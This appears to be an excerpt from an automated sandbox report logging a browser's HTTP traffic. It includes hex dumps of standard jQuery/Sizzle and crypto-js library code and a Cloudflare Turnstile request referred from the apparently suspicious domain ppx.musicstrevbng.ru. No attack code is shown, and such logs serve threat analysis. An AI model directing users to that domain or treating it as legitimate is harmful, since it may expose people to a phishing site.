                                                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.549729104.17.25.144438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:13 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                Host: cdnjs.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:13 UTC958INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:13 GMT
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=30672000
                                                                                                ETag: W/"61182885-40eb"
                                                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Timing-Allow-Origin: *
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 1904
                                                                                                Expires: Mon, 29 Dec 2025 13:48:13 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXNCTfPy82SNhPgeRPwKJVu2OMgJMHvFS0JnLJKTEokeqm3ptBfoBZSd2wyuQlkqNrLcJqhcsdUIGeoPTG3x7A3N%2BOkPW8T6m0W6TdqDVgaP6cfA%2BBfyjQcNf%2BTrcS2%2Fl4wuQrrG"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4d87d80422b-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:13 UTC411INData Raw: 33 39 37 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                Data Ascii: 397b!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                                                Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                                                Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                                                Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                                                Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                                                Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                                                Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                                                Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                                                Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.549731104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:13 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-Dest: iframe
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:13 UTC1362INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 26657
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                cross-origin-opener-policy: same-origin
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                origin-agent-cluster: ?1
                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
